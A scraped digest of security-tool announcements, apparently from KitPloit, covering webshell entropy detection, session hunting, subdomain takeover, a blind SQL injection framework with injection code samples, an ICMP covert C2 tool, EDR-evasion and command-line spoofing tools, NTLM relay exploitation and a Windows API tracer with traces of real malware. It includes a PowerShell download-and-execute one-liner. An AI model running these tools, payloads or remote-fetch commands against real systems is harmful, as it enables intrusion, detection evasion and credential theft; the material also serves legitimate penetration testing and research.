    If a file consists of highly structured data (for example, a text file where most bytes are ASCII characters), the entropy is lower. In the context of finding webshells or malicious files, entropy can be a useful indicator: - Many obfuscated scripts or encrypted payloads can have high entropy because the obfuscation or encryption process makes the data look random. - A normal text file or HTML file would generally have lower entropy because human-readable text has patterns and structure (certain letters are more common, words are usually separated by spaces, etc.). So, a file with unusually high entropy might be suspicious and worth further investigation. However, it's not a surefire indicator of maliciousness -- there are plenty of legitimate reasons a file might have high entropy, and plenty of ways malware might avoid causing high entropy. It's just one tool in a larger toolbox for detecting potential threats.

    ShellSweep includes a Get-Entropy function that calculates the entropy of a file's contents by: - Counting how often each character appears in the file. - Using these frequencies to calculate the probability of each character. - Summing -p*log2(p) for each character, where p is the character's probability. This is the formula for entropy in information theory.

    ShellScan

    ShellScan provides the ability to scan multiple known bad webshell directories and output the average, median, minimum and maximum entropy values by file extension.

    Pass ShellScan.ps1 some directories of webshells, any size set. I used:

    • https://github.com/tennc/webshell
    • https://github.com/BlackArch/webshells
    • https://github.com/tarwich/jackal/blob/master/libraries/

    This will give a decent training set to get entropy values.

    Output example:

    Statistics for .aspx files:
    Average entropy: 4.94212121048115
    Minimum entropy: 1.29348709979974
    Maximum entropy: 6.09830238020383
    Median entropy: 4.85437969842084
    Statistics for .asp files:
    Average entropy: 5.51268104400858
    Minimum entropy: 0.732406213077191
    Maximum entropy: 7.69241278153711
    Median entropy: 5.57351177724806

    ShellCSV

    First, let's break down the usage of ShellCSV and how it assists with identifying entropy of the good files on disk. The idea is that defenders can run this on web servers to gather all files and entropy values to better understand what paths and extensions are most prominent in their working environment.

    See ShellCSV.csv as example output.

    ShellSweep

    First, choose your flavor: Python, PowerShell or Lua.

    • Based on results from ShellScan or ShellCSV, modify entropy values as needed.
    • Modify file extensions as needed. No need to look for ASPX on a non-ASPX app.
    • Modify paths. I don't recommend just scanning all the C:\, lots to filter.
    • Modify any filters needed.
    • Run it!

    If you made it here, this is the part where you iterate on tuning. Find new shell? Gather entropy and modify as needed.

    Questions

    Feel free to open a Git issue.

    Thank You

    If you enjoyed this project, be sure to star the project and share with your family and friends.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Invoke-SessionHunter - Retrieve And Display Information About Active User Sessions On Remote Computers (No Admin Privileges Required)

    By: Zion3R β€” May 16th 2024 at 12:30


    Retrieve and display information about active user sessions on remote computers. No admin privileges required.

    The tool leverages the remote registry service to query the HKEY_USERS registry hive on the remote computers. It identifies and extracts Security Identifiers (SIDs) associated with active user sessions, and translates these into corresponding usernames, offering insights into who is currently logged in.

    If the -CheckAdminAccess switch is provided, it will gather sessions by authenticating to targets where you have local admin access using Invoke-WMIRemoting (which most likely will retrieve more results)

    It's important to note that the remote registry service needs to be running on the remote computer for the tool to work effectively. In my tests, if the service is stopped but its Startup type is configured to "Automatic" or "Manual", the service will start automatically on the target computer once queried (this is native behavior), and sessions information will be retrieved. If set to "Disabled" no session information can be retrieved from the target.


    Usage:

    iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-SessionHunter/main/Invoke-SessionHunter.ps1')

    If run without parameters or switches it will retrieve active sessions for all computers in the current domain by querying the registry

    Invoke-SessionHunter

    Gather sessions by authenticating to targets where you have local admin access

    Invoke-SessionHunter -CheckAsAdmin

    You can optionally provide credentials in the following format

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!"

    You can also use the -FailSafe switch, which will direct the tool to proceed if the target remote registry becomes unresponsive.

    This works in cobination with -Timeout | Default = 2, increase for slower networks.

    Invoke-SessionHunter -FailSafe
    Invoke-SessionHunter -FailSafe -Timeout 5

    Use the -Match switch to show only targets where you have admin access and a privileged user is logged in

    Invoke-SessionHunter -Match

    All switches can be combined

    Invoke-SessionHunter -CheckAsAdmin -UserName "ferrari\Administrator" -Password "P@ssw0rd!" -FailSafe -Timeout 5 -Match

    Specify the target domain

    Invoke-SessionHunter -Domain contoso.local

    Specify a comma-separated list of targets or the full path to a file containing a list of targets - one per line

    Invoke-SessionHunter -Targets "DC01,Workstation01.contoso.local"
    Invoke-SessionHunter -Targets c:\Users\Public\Documents\targets.txt

    Retrieve and display information about active user sessions on servers only

    Invoke-SessionHunter -Servers

    Retrieve and display information about active user sessions on workstations only

    Invoke-SessionHunter -Workstations

    Show active session for the specified user only

    Invoke-SessionHunter -Hunt "Administrator"

    Exclude localhost from the sessions retrieval

    Invoke-SessionHunter -IncludeLocalHost

    Return custom PSObjects instead of table-formatted results

    Invoke-SessionHunter -RawResults

    Do not run a port scan to enumerate for alive hosts before trying to retrieve sessions

    Note: if a host is not reachable it will hang for a while

    Invoke-SessionHunter -NoPortScan


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Subhunter - A Fast Subdomain Takeover Tool

    By: Zion3R β€” May 15th 2024 at 12:30


    Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.


    Features:

    • Auto update
    • Uses random user agents
    • Built in Go
    • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

    Installation:

    Option 1:

    Download from releases

    Option 2:

    Build from source:

    $ git clone https://github.com/Nemesis0U/Subhunter.git
    $ go build subhunter.go

    Usage:

    Options:

    Usage of subhunter:
    -l string
    File including a list of hosts to scan
    -o string
    File to save results
    -t int
    Number of threads for scanning (default 50)
    -timeout int
    Timeout in seconds (default 20)

    Demo (Added fake fingerprint for POC):

    ./Subhunter -l subdomains.txt -o test.txt

    ____ _ _ _
    / ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
    \___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
    ___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
    |____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


    A fast subdomain takeover tool

    Created by Nemesis

    Loaded 88 fingerprints for current scan

    -----------------------------------------------------------------------------

    [+] Nothing found at www.ubereats.com: Not Vulnerable
    [+] Nothing found at testauth.ubereats.com: Not Vulnerable
    [+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
    [+] Nothing found at about.ubereats.com: Not Vulnerable
    [+] Nothing found at beta.ubereats.com: Not Vulnerable
    [+] Nothing found at ewp.ubereats.com: Not Vulnerable
    [+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable
    [+] Nothing found at guest.ubereats.com: Not Vulnerable
    [+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
    [+] Nothing found at info.ubereats.com: Not Vulnerable
    [+] Nothing found at learn.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants.ubereats.com: Not Vulnerable
    [+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
    [+] Nothing found at messages.ubereats.com: Not Vulnerable
    [+] Nothing found at order.ubereats.com: Not Vulnerable
    [+] Nothing found at restaurants.ubereats.com: Not Vulnerable
    [+] Nothing found at payments.ubereats.com: Not Vulnerable
    [+] Nothing found at static.ubereats.com: Not Vulnerable

    Subhunter exiting...
    Results written to test.txt




    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Hakuin - A Blazing Fast Blind SQL Injection Optimization And Automation Framework

    By: Zion3R β€” May 15th 2024 at 01:56


    Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

    Hakuin has been presented at esteemed academic and industrial conferences: - BlackHat MEA, Riyadh, 2023 - Hack in the Box, Phuket, 2023 - IEEE S&P Workshop on Offsensive Technology (WOOT), 2023

    More information can be found in our paper and slides.


    Installation

    To install Hakuin, simply run:

    pip3 install hakuin

    Developers should install the package locally and set the -e flag for editable mode:

    git clone git@github.com:pruzko/hakuin.git
    cd hakuin
    pip3 install -e .

    Examples

    Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.

    Example 1 - Query Parameter Injection with Status-based Inference
    import aiohttp
    from hakuin import Requester

    class StatusRequester(Requester):
    async def request(self, ctx, query):
    r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
    return r.status == 200
    Example 2 - Header Injection with Content-based Inference
    class ContentRequester(Requester):
    async def request(self, ctx, query):
    headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
    r = await aiohttp.get(f'http://vuln.com/', headers=headers)
    return 'found' in await r.text()

    To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.

    Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
    import asyncio
    from hakuin import Extractor, Requester
    from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

    class StatusRequester(Requester):
    ...

    async def main():
    # requester: Use this Requester
    # dbms: Use this DBMS
    # n_tasks: Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

    if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())

    Now that eveything is set, you can start extracting DB metadata.

    Example 1 - Extracting DB Schemas
    # strategy:
    # 'binary': Use binary search
    # 'model': Use pre-trained model
    schema_names = await ext.extract_schema_names(strategy='model')
    Example 2 - Extracting Tables
    tables = await ext.extract_table_names(strategy='model')
    Example 3 - Extracting Columns
    columns = await ext.extract_column_names(table='users', strategy='model')
    Example 4 - Extracting Tables and Columns Together
    metadata = await ext.extract_meta(strategy='model')

    Once you know the structure, you can extract the actual content.

    Example 1 - Extracting Generic Columns
    # text_strategy:    Use this strategy if the column is text
    res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
    Example 2 - Extracting Textual Columns
    # strategy:
    # 'binary': Use binary search
    # 'fivegram': Use five-gram model
    # 'unigram': Use unigram model
    # 'dynamic': Dynamically identify the best strategy. This setting
    # also enables opportunistic guessing.
    res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
    Example 3 - Extracting Integer Columns
    res = await ext.extract_column_int(table='users', column='id')
    Example 4 - Extracting Float Columns
    res = await ext.extract_column_float(table='products', column='price')
    Example 5 - Extracting Blob (Binary Data) Columns
    res = await ext.extract_column_blob(table='users', column='id')

    More examples can be found in the tests directory.

    Using Hakuin from the Command Line

    Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:

    python3 hk.py -h

    For Researchers

    This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.

    Cite Hakuin

    @inproceedings{hakuin_bsqli,
    title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
    author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
    booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
    pages={384--393},
    year={2023},
    organization={IEEE}
    }


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    BypassFuzzer - Fuzz 401/403/404 Pages For Bypasses

    By: Zion3R β€” May 13th 2024 at 12:30


    The original 403fuzzer.py :)

    Fuzz 401/403ing endpoints for bypasses

    This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.

    It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.

    I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.

    You can now feed it raw HTTP requests that you save to a file from Burp.

    Follow me on twitter! @intrudir


    Usage

    usage: bypassfuzzer.py -h

    Specifying a request to test

    Best method: Feed it a raw HTTP request from Burp!

    Simply paste the request into a file and run the script!
    - It will parse and use cookies & headers from the request. - Easiest way to authenticate for your requests

    python3 bypassfuzzer.py -r request.txt

    Using other flags

    Specify a URL

    python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html

    Specify cookies to use in requests:
    some examples:

    --cookies "cookie1=blah"
    -c "cookie1=blah; cookie2=blah"

    Specify a method/verb and body data to send

    bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
    bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"

    Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>

    Specify -H "header: value" for each additional header you'd like to add:

    bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"

    Smart filter feature!

    Based on response code and length. If it sees a response 8 times or more it will automatically mute it.

    Repeats are changeable in the code until I add an option to specify it in flag

    NOTE: Can't be used simultaneously with -hc or -hl (yet)

    # toggle smart filter on
    bypassfuzzer.py -u https://example.com/forbidden --smart

    Specify a proxy to use

    Useful if you wanna proxy through Burp

    bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080

    Skip sending header payloads or url payloads

    # skip sending headers payloads
    bypassfuzzer.py -u https://example.com/forbidden -sh
    bypassfuzzer.py -u https://example.com/forbidden --skip-headers

    # Skip sending path normailization payloads
    bypassfuzzer.py -u https://example.com/forbidden -su
    bypassfuzzer.py -u https://example.com/forbidden --skip-urls

    Hide response code/length

    Provide comma delimited lists without spaces. Examples:

    # Hide response codes
    bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400

    # Hide response lengths of 638
    bypassfuzzer.py -u https://example.com/forbidden -hl 638

    TODO

    • [x] Automatically check other methods/verbs for bypass
    • [x] absolute domain attack
    • [ ] Add HTTP/2 support
    • [ ] Looking for ideas. Ping me on twitter! @intrudir


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    PingRAT - Secretly Passes C2 Traffic Through Firewalls Using ICMP Payloads

    By: Zion3R β€” May 12th 2024 at 12:30


    PingRAT secretly passes C2 traffic through firewalls using ICMP payloads.

    Features:

    • Uses ICMP for Command and Control
    • Undetectable by most AV/EDR solutions
    • Written in Go

    Installation:

    Download the binaries

    or build the binaries and you are ready to go:

    $ git clone https://github.com/Nemesis0U/PingRAT.git
    $ go build client.go
    $ go build server.go

    Usage:

    Server:

    ./server -h
    Usage of ./server:
    -d string
    Destination IP address
    -i string
    Listener (virtual) Network Interface (e.g. eth0)

    Client:

    ./client -h
    Usage of ./client:
    -d string
    Destination IP address
    -i string
    (Virtual) Network Interface (e.g., eth0)



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    LOLSpoof - An Interactive Shell To Spoof Some LOLBins Command Line

    By: Zion3R β€” May 11th 2024 at 12:30


    LOLSpoof is a an interactive shell program that automatically spoof the command line arguments of the spawned process. Just call your incriminate-looking command line LOLBin (e.g. powershell -w hidden -enc ZwBlAHQALQBwAHIAbwBjAGUA....) and LOLSpoof will ensure that the process creation telemetry appears legitimate and clear.


    Why

    Process command line is a very monitored telemetry, being thoroughly inspected by AV/EDRs, SOC analysts or threat hunters.

    How

    1. Prepares the spoofed command line out of the real one: lolbin.exe " " * sizeof(real arguments)
    2. Spawns that suspended LOLBin with the spoofed command line
    3. Gets the remote PEB address
    4. Gets the address of RTL_USER_PROCESS_PARAMETERS struct
    5. Gets the address of the command line unicode buffer
    6. Overrides the fake command line with the real one
    7. Resumes the main thread

    Opsec considerations

    Although this simple technique helps to bypass command line detection, it may introduce other suspicious telemetry: 1. Creation of suspended process 2. The new process has trailing spaces (but it's really easy to make it a repeated character or even random data instead) 3. Write to the spawned process with WriteProcessMemory

    Build

    Built with Nim 1.6.12 (compiling with Nim 2.X yields errors!)

    nimble install winim

    Known issue

    Programs that clear or change the previous printed console messages (such as timeout.exe 10) breaks the program. when such commands are employed, you'll need to restart the console. Don't know how to fix that, open to suggestions.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    SQLMC - Check All Urls Of A Domain For SQL Injections

    By: Zion3R β€” May 10th 2024 at 12:30


    SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

    Features

    • Scans a domain for SQL injection vulnerabilities
    • Crawls the given URL up to a specified depth
    • Checks each link for SQL injection vulnerabilities
    • Reports vulnerabilities along with server information and depth

    Installation

    1. Install the required dependencies: bash pip3 install sqlmc

    Usage

    Run sqlmc with the following command-line arguments:

    • -u, --url: The URL to scan (required)
    • -d, --depth: The depth to scan (required)
    • -o, --output: The output file to save the results

    Example usage:

    sqlmc -u http://example.com -d 2

    Replace http://example.com with the URL you want to scan and 3 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.

    The tool will then perform the scan and display the results.

    ToDo

    • Check for multiple GET params
    • Better injection checker trigger methods

    Credits

    License

    This project is licensed under the GNU Affero General Public License v3.0.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    BadExclusionsNWBO - An Evolution From BadExclusions To Identify Folder Custom Or Undocumented Exclusions On AV/EDR

    By: Zion3R β€” May 9th 2024 at 12:30


    BadExclusionsNWBO is an evolution from BadExclusions to identify folder custom or undocumented exclusions on AV/EDR.

    How it works?

    BadExclusionsNWBO copies and runs Hook_Checker.exe in all folders and subfolders of a given path. You need to have Hook_Checker.exe on the same folder of BadExclusionsNWBO.exe.

    Hook_Checker.exe returns the number of EDR hooks. If the number of hooks is 7 or less means folder has an exclusion otherwise the folder is not excluded.


    Original idea?

    Since the release of BadExclusions I've been thinking on how to achieve the same results without creating that many noise. The solution came from another tool, https://github.com/asaurusrex/Probatorum-EDR-Userland-Hook-Checker.

    If you download Probatorum-EDR-Userland-Hook-Checker and you run it inside a regular folder and on folder with an specific type of exclusion you will notice a huge difference. All the information is on the Probatorum repository.

    Requirements

    Each vendor apply exclusions on a different way. In order to get the list of folder exclusions an specific type of exclusion should be made. Not all types of exclusion and not all the vendors remove the hooks when they exclude a folder.

    The user who runs BadExclusionsNWBO needs write permissions on the excluded folder in order to write Hook_Checker file and get the results.

    EDR Demo

    https://github.com/iamagarre/BadExclusionsNWBO/assets/89855208/46982975-f4a5-4894-b78d-8d6ed9b1c8c4



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers

    By: Zion3R β€” May 8th 2024 at 12:30

    Description

    Presented at CODE BLUE 2023, this project titled Enhanced Vulnerability Hunting in WDM Drivers with Symbolic Execution and Taint Analysis introduces IOCTLance, a tool that enhances its capacity to detect various vulnerability types in Windows Driver Model (WDM) drivers. In a comprehensive evaluation involving 104 known vulnerable WDM drivers and 328 unknow n ones, IOCTLance successfully unveiled 117 previously unidentified vulnerabilities within 26 distinct drivers. As a result, 41 CVEs were reported, encompassing 25 cases of denial of service, 5 instances of insufficient access control, and 11 examples of elevation of privilege.


    Features

    Target Vulnerability Types

    • map physical memory
    • controllable process handle
    • buffer overflow
    • null pointer dereference
    • read/write controllable address
    • arbitrary shellcode execution
    • arbitrary wrmsr
    • arbitrary out
    • dangerous file operation

    Optional Customizations

    • length limit
    • loop bound
    • total timeout
    • IoControlCode timeout
    • recursion
    • symbolize data section

    Build

    Docker (Recommand)

    docker build .

    Local

    dpkg --add-architecture i386
    apt-get update
    apt-get install git build-essential python3 python3-pip python3-dev htop vim sudo \
    openjdk-8-jdk zlib1g:i386 libtinfo5:i386 libstdc++6:i386 libgcc1:i386 \
    libc6:i386 libssl-dev nasm binutils-multiarch qtdeclarative5-dev libpixman-1-dev \
    libglib2.0-dev debian-archive-keyring debootstrap libtool libreadline-dev cmake \
    libffi-dev libxslt1-dev libxml2-dev

    pip install angr==9.2.18 ipython==8.5.0 ipdb==0.13.9

    Analysis

    # python3 analysis/ioctlance.py -h
    usage: ioctlance.py [-h] [-i IOCTLCODE] [-T TOTAL_TIMEOUT] [-t TIMEOUT] [-l LENGTH] [-b BOUND]
    [-g GLOBAL_VAR] [-a ADDRESS] [-e EXCLUDE] [-o] [-r] [-c] [-d]
    path

    positional arguments:
    path dir (including subdirectory) or file path to the driver(s) to analyze

    optional arguments:
    -h, --help show this help message and exit
    -i IOCTLCODE, --ioctlcode IOCTLCODE
    analyze specified IoControlCode (e.g. 22201c)
    -T TOTAL_TIMEOUT, --total_timeout TOTAL_TIMEOUT
    total timeout for the whole symbolic execution (default 1200, 0 to unlimited)
    -t TIMEOUT, --timeout TIMEOUT
    timeout for analyze each IoControlCode (default 40, 0 to unlimited)
    -l LENGTH, --length LENGTH
    the limit of number of instructions for technique L engthLimiter (default 0, 0
    to unlimited)
    -b BOUND, --bound BOUND
    the bound for technique LoopSeer (default 0, 0 to unlimited)
    -g GLOBAL_VAR, --global_var GLOBAL_VAR
    symbolize how many bytes in .data section (default 0 hex)
    -a ADDRESS, --address ADDRESS
    address of ioctl handler to directly start hunting with blank state (e.g.
    140005c20)
    -e EXCLUDE, --exclude EXCLUDE
    exclude function address split with , (e.g. 140005c20,140006c20)
    -o, --overwrite overwrite x.sys.json if x.sys has been analyzed (default False)
    -r, --recursion do not kill state if detecting recursion (default False)
    -c, --complete get complete base state (default False)
    -d, --debug print debug info while analyzing (default False)

    Evaluation

    # python3 evaluation/statistics.py -h
    usage: statistics.py [-h] [-w] path

    positional arguments:
    path target dir or file path

    optional arguments:
    -h, --help show this help message and exit
    -w, --wdm copy the wdm drivers into <path>/wdm

    Test

    1. Compile the testing examples in test to generate testing driver files.
    2. Run IOCTLance against the drvier files.

    Reference



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    NTLM Relay Gat - Powerful Tool Designed To Automate The Exploitation Of NTLM Relays

    By: Zion3R β€” May 8th 2024 at 03:30


    NTLM Relay Gat is a powerful tool designed to automate the exploitation of NTLM relays using ntlmrelayx.py from the Impacket tool suite. By leveraging the capabilities of ntlmrelayx.py, NTLM Relay Gat streamlines the process of exploiting NTLM relay vulnerabilities, offering a range of functionalities from listing SMB shares to executing commands on MSSQL databases.


    Features

    • Multi-threading Support: Utilize multiple threads to perform actions concurrently.
    • SMB Shares Enumeration: List available SMB shares.
    • SMB Shell Execution: Execute a shell via SMB.
    • Secrets Dumping: Dump secrets from the target.
    • MSSQL Database Enumeration: List available MSSQL databases.
    • MSSQL Command Execution: Execute operating system commands via xp_cmdshell or start SQL Server Agent jobs.

    Prerequisites

    Before you begin, ensure you have met the following requirements:

    • proxychains properly configured with ntlmrelayx SOCKS relay port
    • Python 3.6+

    Installation

    To install NTLM Relay Gat, follow these steps:

    1. Ensure that Python 3.6 or higher is installed on your system.

    2. Clone NTLM Relay Gat repository:

    git clone https://github.com/ad0nis/ntlm_relay_gat.git
    cd ntlm_relay_gat
    1. Install dependencies, if you don't have them installed already:
    pip install -r requirements.txt

    NTLM Relay Gat is now installed and ready to use.

    Usage

    To use NTLM Relay Gat, make sure you've got relayed sessions in ntlmrelayx.py's socks command output and that you have proxychains configured to use ntlmrelayx.py's proxy, and then execute the script with the desired options. Here are some examples of how to run NTLM Relay Gat:

    # List available SMB shares using 10 threads
    python ntlm_relay_gat.py --smb-shares -t 10

    # Execute a shell via SMB
    python ntlm_relay_gat.py --smb-shell --shell-path /path/to/shell

    # Dump secrets from the target
    python ntlm_relay_gat.py --dump-secrets

    # List available MSSQL databases
    python ntlm_relay_gat.py --mssql-dbs

    # Execute an operating system command via xp_cmdshell
    python ntlm_relay_gat.py --mssql-exec --mssql-method 1 --mssql-command 'whoami'

    Disclaimer

    NTLM Relay Gat is intended for educational and ethical penetration testing purposes only. Usage of NTLM Relay Gat for attacking targets without prior mutual consent is illegal. The developers of NTLM Relay Gat assume no liability and are not responsible for any misuse or damage caused by this tool.

    License

    This project is licensed under the MIT License - see the LICENSE file for details.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Gftrace - A Command Line Windows API Tracing Tool For Golang Binaries

    By: Zion3R β€” May 6th 2024 at 12:30


    A command line Windows API tracing tool for Golang binaries.

    Note: This tool is a PoC and a work-in-progress prototype so please treat it as such. Feedbacks are always welcome!


    How it works?

    Although Golang programs contains a lot of nuances regarding the way they are built and their behavior in runtime they still need to interact with the OS layer and that means at some point they do need to call functions from the Windows API.

    The Go runtime package contains a function called asmstdcall and this function is a kind of "gateway" used to interact with the Windows API. Since it's expected this function to call the Windows API functions we can assume it needs to have access to information such as the address of the function and it's parameters, and this is where things start to get more interesting.

    Asmstdcall receives a single parameter which is pointer to something similar to the following structure:

    struct LIBCALL {
    DWORD_PTR Addr;
    DWORD Argc;
    DWORD_PTR Argv;
    DWORD_PTR ReturnValue;

    [...]
    }

    Some of these fields are filled after the API function is called, like the return value, others are received by asmstdcall, like the function address, the number of arguments and the list of arguments. Regardless when those are set it's clear that the asmstdcall function manipulates a lot of interesting information regarding the execution of programs compiled in Golang.

    The gftrace leverages asmstdcall and the way it works to monitor specific fields of the mentioned struct and log it to the user. The tool is capable of log the function name, it's parameters and also the return value of each Windows function called by a Golang application. All of it with no need to hook a single API function or have a signature for it.

    The tool also tries to ignore all the noise from the Go runtime initialization and only log functions called after it (i.e. functions from the main package).

    If you want to know more about this project and research check the blogpost.

    Installation

    Download the latest release.

    Usage

    1. Make sure gftrace.exe, gftrace.dll and gftrace.cfg are in the same directory.
    2. Specify which API functions you want to trace in the gftrace.cfg file (the tool does not work without API filters applied).
    3. Run gftrace.exe passing the target Golang program path as a parameter.
    gftrace.exe <filepath> <params>

    Configuration

    All you need to do is specify which functions you want to trace in the gftrace.cfg file, separating it by comma with no spaces:

    CreateFileW,ReadFile,CreateProcessW

    The exact Windows API functions a Golang method X of a package Y would call in a specific scenario can only be determined either by analysis of the method itself or trying to guess it. There's some interesting characteristics that can be used to determine it, for example, Golang applications seems to always prefer to call functions from the "Wide" and "Ex" set (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc) so you can consider it during your analysis.

    The default config file contains multiple functions in which I tested already (at least most part of them) and can say for sure they can be called by a Golang application at some point. I'll try to update it eventually.

    Examples

    Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:

    - CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
    - ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
    - CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
    - ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)

    Tracing CreateProcessW() in the TunnelFish malware:

    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress |  ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
    - CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)

    [...]

    Tracing multiple functions in the Sunshuttle malware:

    - CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
